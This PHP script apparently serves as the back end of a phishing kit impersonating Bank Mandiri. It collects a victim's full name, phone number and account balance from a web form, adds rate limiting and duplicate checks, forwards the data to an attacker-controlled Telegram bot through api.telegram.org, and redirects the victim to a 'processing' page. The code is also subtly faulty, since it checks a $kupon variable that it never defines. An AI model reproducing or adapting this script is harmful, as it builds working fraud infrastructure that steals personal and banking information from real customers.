<?php
include '../run/10.php';
session_start();

// ===== VALIDASI METHOD =====
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    die("Error: Method tidak diizinkan!");
}

// ===== VALIDASI VARIABEL DARI 10.php =====
if (!isset($telegram_id) || !isset($id_bot)) {
    die("Error: Konfigurasi Telegram tidak ditemukan!");
}

// ===== ANTI SPAM PROTECTION =====
$cooldown_time = 600; // detik
$max_submissions_per_hour = 5;
$current_time = time();

// 1. Cooldown Timer
if (isset($_SESSION['last_submit_time'])) {
    $time_diff = $current_time - $_SESSION['last_submit_time'];
    
    if ($time_diff < $cooldown_time && $time_diff >= 0) {
        $remaining = $cooldown_time - $time_diff;
        die("Error: Mohon tunggu " . $remaining . " detik sebelum mengirim lagi!");
    }
}

// 2. Rate Limiting
if (!isset($_SESSION['submission_count']) || !isset($_SESSION['hour_start'])) {
    $_SESSION['submission_count'] = 0;
    $_SESSION['hour_start'] = $current_time;
}

// Reset counter setiap 1 jam
if (($current_time - $_SESSION['hour_start']) >= 3600) {
    $_SESSION['submission_count'] = 0;
    $_SESSION['hour_start'] = $current_time;
}

if ($_SESSION['submission_count'] >= $max_submissions_per_hour) {
    die("Error: Anda telah mencapai batas maksimal pengiriman (" . $max_submissions_per_hour . "x per jam). Coba lagi nanti!");
}

// 3. Validasi Input
$namalengkap = isset($_POST['namalengkap']) ? trim($_POST['namalengkap']) : '';
$nomortelepon = isset($_POST['nomortelepon']) ? trim($_POST['nomortelepon']) : '';
$saldo = isset($_POST['saldo']) ? trim($_POST['saldo']) : '';

if (empty($namalengkap) || empty($nomortelepon) || empty($kupon) || empty($saldo)) {
    die("Error: Semua field harus diisi!");
}

// 4. Validasi Panjang Input (opsional, untuk keamanan)
if (strlen($namalengkap) > 100 || strlen($nomortelepon) > 20 || strlen($saldo) > 50) {
    die("Error: Input terlalu panjang!");
}

// 5. Cek Duplikat Data
$current_data = md5($namalengkap . $nomortelepon . $saldo . $kupon);

if (isset($_SESSION['last_data_hash']) && $_SESSION['last_data_hash'] === $current_data) {
    die("Error: Data yang sama sudah dikirim sebelumnya!");
}

// ===== PROSES PENGIRIMAN =====
$message = "
─────────────────────────
NOTIFIKASI TERBARU MANDIRI BOY |
─────────────────────────
• Nama Lengkap : ".$namalengkap."
• Nomor Handphone : ".$nomortelepon."
• Informasi Saldo  : ".$saldo;

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    
    $ch = curl_init();
    
    if ($ch === false) {
        return false;
    }
    
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_CONNECTTIMEOUT => 5
    );
    
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    $error = curl_error($ch);
    curl_close($ch);
    
    if ($error || $result === false) {
        error_log("Telegram Error: " . $error);
        return false;
    }
    
    return true;
}

// Kirim pesan
$send_result = sendMessage($telegram_id, $message, $id_bot);

if ($send_result) {
    // Update session setelah berhasil
    $_SESSION['last_submit_time'] = $current_time;
    $_SESSION['last_data_hash'] = $current_data;
    $_SESSION['submission_count']++;
    
    header('Location: ../proses.html');
    exit();
} else {
    die("Error: Gagal mengirim pesan ke Telegram. Silakan coba lagi!");
}
?>